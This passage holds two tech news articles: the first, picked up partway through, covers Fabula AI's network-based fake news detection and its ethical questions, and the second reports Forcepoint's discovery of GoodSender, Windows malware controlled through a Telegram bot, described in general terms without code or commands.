Somewhat terrifyingly, the model could also be used to predict virality, according to Bronstein — raising the dystopian prospect of the API being used for the opposite purpose to that which it’s intended: i.e. maliciously, by fake news purveyors, to further amp up their (anti)social spread.

“Potentially putting it into evil hands it might do harm,” Bronstein concedes. Though he takes a philosophical view on the hyper-powerful double-edged sword of AI technology, arguing such technologies will create an imperative for a rethinking of the news ecosystem by all stakeholders, as well as encouraging emphasis on user education and teaching critical thinking.

Let’s certainly hope so. And, on the educational front, Fabula is hoping its technology can play an important role — by spotlighting network-based cause and effect.

“People now like or retweet or basically spread information without thinking too much or the potential harm or damage they’re doing to everyone,” says Bronstein, pointing again to the infectious diseases analogy. “It’s like not vaccinating yourself or your children. If you think a little bit about what you’re spreading on a social network you might prevent an epidemic.”

So, tl;dr, think before you RT.

Returning to the accuracy rate of Fabula’s model, while ~93 per cent might sound pretty impressive, if it were applied to content on a massive social network like Facebook — which has some 2.3BN+ users, uploading what could be trillions of pieces of content daily — even a seven percent failure rate would still make for an awful lot of fakes slipping undetected through the AI’s net.

But Bronstein says the technology does not have to be used as a standalone moderation system. Rather he suggests it could be used in conjunction with other approaches such as content analysis, and thus function as another string on a wider ‘BS detector’s bow.

It could also, he suggests, further aid human content reviewers — to point them to potentially problematic content more quickly.

Depending on how the technology gets used he says it could do away with the need for independent third party fact-checking organizations altogether because the deep learning system can be adapted to different use cases.

Example use-cases he mentions include an entirely automated filter (i.e. with no human reviewer in the loop); or to power a content credibility ranking system that can down-weight dubious stories or even block them entirely; or for intermediate content screening to flag potential fake news for human attention.

Each of those scenarios would likely entail a different truth-risk confidence score. Though most — if not all — would still require some human back-up. If only to manage overarching ethical and legal considerations related to largely automated decisions. (Europe’s GDPR framework has some requirements on that front, for example.)

Facebook’s grave failures around moderating hate speech in Myanmar — which led to its own platform becoming a megaphone for terrible ethnical violence — were very clearly exacerbated by the fact it did not have enough reviewers who were able to understand (the many) local languages and dialects spoken in the country.

So if Fabula’s language-agnostic propagation and user focused approach proves to be as culturally universal as its makers hope, it might be able to raise flags faster than human brains which lack the necessary language skills and local knowledge to intelligently parse context.

“Of course we can incorporate content features but we don’t have to — we don’t want to,” says Bronstein. “The method can be made language independent. So it doesn’t matter whether the news are written in French, in English, in Italian. It is based on the way the news propagates on the network.”

Although he also concedes: “We have not done any geographic, localized studies.”

“Most of the news that we take are from PolitiFact so they somehow regard mainly the American political life but the Twitter users are global. So not all of them, for example, tweet in English. So we don’t yet take into account tweet content itself or their comments in the tweet — we are looking at the propagation features and the user features,” he continues.

“These will be obviously next steps but we hypothesis that it’s less language dependent. It might be somehow geographically varied. But these will be already second order details that might make the model more accurate. But, overall, currently we are not using any location-specific or geographic targeting for the model.

“But it will be an interesting thing to explore. So this is one of the things we’ll be looking into in the future.”

Fabula’s approach being tied to the spread (and the spreaders) of fake news certainly means there’s a raft of associated ethical considerations that any platform making use of its technology would need to be hyper sensitive to.

For instance, if platforms could suddenly identify and label a sub-set of users as ‘junk spreaders’ the next obvious question is how will they treat such people?

Would they penalize them with limits — or even a total block — on their power to socially share on the platform? And would that be ethical or fair given that not every sharer of fake news is maliciously intending to spread lies?

What if it turns out there’s a link between — let’s say — a lack of education and propensity to spread disinformation? As there can be a link between poverty and education… What then? Aren’t your savvy algorithmic content downweights risking exacerbating existing unfair societal divisions?

Bronstein agrees there are major ethical questions ahead when it comes to how a ‘fake news’ classifier gets used.

“Imagine that we find a strong correlation between the political affiliation of a user and this ‘credibility’ score. So for example we can tell with hyper-ability that if someone is a Trump supporter then he or she will be mainly spreading fake news. Of course such an algorithm would provide great accuracy but at least ethically it might be wrong,” he says when we ask about ethics.

He confirms Fabula is not using any kind of political affiliation information in its model at this point — but it’s all too easy to imagine this sort of classifier being used to surface (and even exploit) such links.

“What is very important in these problems is not only to be right — so it’s great of course that we’re able to quantify fake news with this accuracy of ~90 percent — but it must also be for the right reasons,” he adds.

The London-based startup was founded in April last year, though the academic research underpinning the algorithms has been in train for the past four years, according to Bronstein.

The patent for their method was filed in early 2016 and granted last July.

They’ve been funded by $500,000 in angel funding and about another $500,000 in total of European Research Council grants plus academic grants from tech giants Amazon, Google and Facebook, awarded via open research competition awards.

(Bronstein confirms the three companies have no active involvement in the business. Though doubtless Fabula is hoping to turn them into customers for its API down the line. But he says he can’t discuss any potential discussions it might be having with the platforms about using its tech.)

Focusing on spotting patterns in how content spreads as a detection mechanism does have one major and obvious drawback — in that it only works after the fact of (some) fake content spread. So this approach could never entirely stop disinformation in its tracks.

Though Fabula claims detection is possible within a relatively short time frame — of between two and 20 hours after content has been seeded onto a network.

“What we show is that this spread can be very short,” he says. “We looked at up to 24 hours and we’ve seen that just in a few hours… we can already make an accurate prediction. Basically it increases and slowly saturates. Let’s say after four or five hours we’re already about 90 per cent.”

“We never worked with anything that was lower than hours but we could look,” he continues. “It really depends on the news. Some news does not spread that fast. Even the most groundbreaking news do not spread extremely fast. If you look at the percentage of the spread of the news in the first hours you get maybe just a small fraction. The spreading is usually triggered by some important nodes in the social network. Users with many followers, tweeting or retweeting. So there are some key bottlenecks in the network that make something viral or not.”

A network-based approach to content moderation could also serve to further enhance the power and dominance of already hugely powerful content platforms — by making the networks themselves core to social media regulation, i.e. if pattern-spotting algorithms rely on key network components (such as graph structure) to function.

So you can certainly see why — even above a pressing business need — tech giants are at least interested in backing the academic research. Especially with politicians increasingly calling for online content platforms to be regulated like publishers.

At the same time, there are — what look like — some big potential positives to analyzing spread, rather than content, for content moderation purposes.

As noted above, the approach doesn’t require training the algorithms on different languages and (seemingly) cultural contexts — setting it apart from content-based disinformation detection systems. So if it proves as robust as claimed it should be more scalable.

Though, as Bronstein notes, the team have mostly used U.S. political news for training their initial classifier. So some cultural variations in how people spread and react to nonsense online at least remains a possibility.

A more certain challenge is “interpretability” — aka explaining what underlies the patterns the deep learning technology has identified via the spread of fake news.

While algorithmic accountability is very often a challenge for AI technologies, Bronstein admits it’s “more complicated” for geometric deep learning.

“We can potentially identify some features that are the most characteristic of fake vs true news,” he suggests when asked whether some sort of ‘formula’ of fake news can be traced via the data, noting that while they haven’t yet tried to do this they did observe “some polarization”.

“There are basically two communities in the social network that communicate mainly within the community and rarely across the communities,” he says. “Basically it is less likely that somebody who tweets a fake story will be retweeted by somebody who mostly tweets real stories. There is a manifestation of this polarization. It might be related to these theories of echo chambers and various biases that exist. Again we didn’t dive into trying to explain it from a sociological point of view — but we observed it.”

So while, in recent years, there have been some academic efforts to debunk the notion that social media users are stuck inside filter bubble bouncing their own opinions back at them, Fabula’s analysis of the landscape of social media opinions suggests they do exist — albeit, just not encasing every Internet user.

Bronstein says the next steps for the startup is to scale its prototype to be able to deal with multiple requests so it can get the API to market in 2019 — and start charging publishers for a truth-risk/reliability score for each piece of content they host.

“We’ll probably be providing some restricted access maybe with some commercial partners to test the API but eventually we would like to make it useable by multiple people from different businesses,” says requests. “Potentially also private users — journalists or social media platforms or advertisers. Basically we want to be… a clearing house for news.”

Decrypted Telegram bot chatter revealed as new Windows malware

Sometimes it take a small bug in one thing to find something massive elsewhere.

During an investigation recent, security firm Forcepoint Labs said it found a new kind of malware that was found taking instructions from a hacker sending commands over the encrypted messaging app Telegram .

The researchers described their newly discovered malware, dubbed GoodSender, as a “fairly simple” Windows-based malware that’s about a year old, which uses Telegram as the method to listen and wait for commands. Once the malware infects its target, it creates a new administrator account and enables remote desktop — and waits. As soon as the malware infects, it sends back the username and randomly generated password to the hacker through Telgram.

It’s not the first time malware has used a commercial product to communicate with malware. If it’s over the internet, hackers are hiding commands in pictures posted to Twitter or in comments left on celebrity Instagram posts.

But using an encrypted messenger makes it far harder to detect. At least, that’s the theory.

Forcepoint said in its research out Thursday that it only stumbled on the malware after it found a vulnerability in Telegram’s notoriously bad encryption.

End-to-end messages are encrypted using the app’s proprietary MTProto protocol, long slammed by cryptographers for leaking metadata and having flaws, and likened to “being stabbed in the eye with a fork.” Its bots, however, only use traditional TLS — or HTTPS — to communicate. The leaking metadata makes it easy to man-in-the-middle the connection and abuse the bots’ API to read bot sent-and-received messages, but also recover the full messaging history of the target bot, the researchers say.

When the researchers found the hacker using a Telegram bot to communicate with the malware, they dug in to learn more.

Fortunately, they were able to trace back the bot’s entire message history to the malware because each message had a unique message ID that increased incrementally, allowing the researchers to run a simple script to replay and scrape the bot’s conversation history.

The GoodSender malware is active and sends its first victim information. (Image: Forcepoint)

“This meant that we could track [the hacker’s] first steps towards creating and deploying the malware all the way through to current campaigns in the form of communications to and from both victims and test machines,” the researchers said.

Your bot uncovered, your malware discovered — what can make it worse for the hacker? The researchers know who they are.

Because the hacker didn’t have a clear separation between their development and production workspaces, the researchers say they could track the malware author because they used their own computer and didn’t mask their IP address.

The researchers could also see exactly what commands the malware would listen to: take screenshots, remove or download files, get IP address data, copy whatever’s in the clipboard, and even restart the PC.

But the researchers don’t have all the answers. How did the malware get onto victim computers in the first place? They suspect they used the so-called EternalBlue exploit, a hacking tool designed to target Windows computers, developed by and stolen from the National Security Agency, to gain access to unpatched computers. And they don’t know how many victims there are, except that there is likely more than 120 victims in the U.S., followed by Vietnam, India, and Australia.

Forcepoint informed Telegram of the vulnerability. TechCrunch also reached out to Telegram’s founder and chief executive Pavel Durov for comment, but didn’t hear back.

If there’s a lesson to learn? Be careful using bots on Telegram — and certainly don’t use Telegram for your malware.